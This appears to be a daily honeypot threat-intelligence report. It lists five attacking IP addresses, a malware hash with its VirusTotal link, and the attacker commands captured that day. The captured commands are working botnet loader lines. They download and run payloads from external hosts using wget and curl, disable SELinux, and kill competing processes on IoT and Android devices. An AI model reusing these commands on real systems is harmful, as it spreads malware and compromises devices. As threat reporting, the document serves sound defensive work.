Top 5 IPs for 29-08-2024 :

118.70.170.120
206.189.143.26
188.0.130.250
36.92.104.229
176.226.130.30


Malware Observed:

File Name : sshd
01fedc99994c93b912248558cba5d88b9452bcc9d53d3557fd2fa41d3ac26328
https://www.virustotal.com/gui/file/01fedc99994c93b912248558cba5d88b9452bcc9d53d3557fd2fa41d3ac26328


Commands/exploits observed

root
...admin
start
enable
config terminal
system
linuxshell
su
shell
sh
cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\\x45\\x4c\\x46'
/bin/busybox wget;/bin/busybox echo -ne '\\x45\\x4c\\x46'
cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://192.168.1.1:8088/i; curl -O http://192.168.1.1:8088/i; /bin/busybox wget http://192.168.1.1:8088/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'




su 0 kill -9 $(toybox ps -eo pid,%cpu,cmd --sort=-%cpu | awk 'NR>1 && $3 !~ /^(surfaceflinger|system_server)/ && $2 > 15 && $1 != '$$' {print $1}');kill -9 $(toybox ps -eo pid,%cpu,cmd --sort=-%cpu | awk 'NR>1 && $3 !~ /^(surfaceflinger|system_server)/ && $2 > 20 && $1 != '$$' {print $1}');toybox pkill M;toybox pkill -9 arm;toybox pkill -9 arm7;toybox pkill -9 x86;toybox pkill -9 x86_64;su 0 toybox pkill M;su 0 toybox pkill -9 arm;su 0 toybox pkill -9 arm7;su 0 toybox pkill -9 x86;su 0 toybox pkill -9 x86_64;su 0 rm -rf /data/local;su 0 mkdir /data/local/;su 0 mkdir /data/local/tmp;su 0 chmod 777 /data/local;su 0 chmod 777 /data/local/tmp;chmod 777 /data/local/tmp; cd /data/local/tmp || cd /data/local/.most || cd /data/local/most; rm -rf *;setenforce 0;busybox wget http://103.238.235.163/and || su 0 busybox wget http://103.238.235.163/and;chmod 777 and || su 0 chmod 777 and;sh and;su 0 mv /data/local/tmp /data/local/.most;su 0 chmod 777 /data/local;su 0 echo hacker > /data/local/tmp;su 0 chmod 444 /data/local;ulimit 999999
